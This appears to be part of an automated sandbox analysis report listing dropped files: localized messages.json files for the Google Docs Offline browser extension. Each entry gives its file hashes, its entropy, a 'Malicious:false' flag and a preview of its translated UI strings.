                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):977
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                                                            MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                                                            SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                                                            SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                                                            SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):972
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                                                            MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                                                            SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                                                            SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                                                            SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):990
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                                                            MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                                                            SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                                                            SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                                                            SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1658
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                                                            MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                                                            SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                                                            SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                                                            SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1672
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                                                            MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                                                            SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                                                            SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                                                            SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):935
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1065
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2771
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):858
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):954
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):899
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):2230
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                                                                            Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir8084_1692992768\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                                                                                                                                                                                            Download File
                                                                                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                                                                            Size (bytes):1160
                                                                                                                                                                                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                                                                            Malicious:false
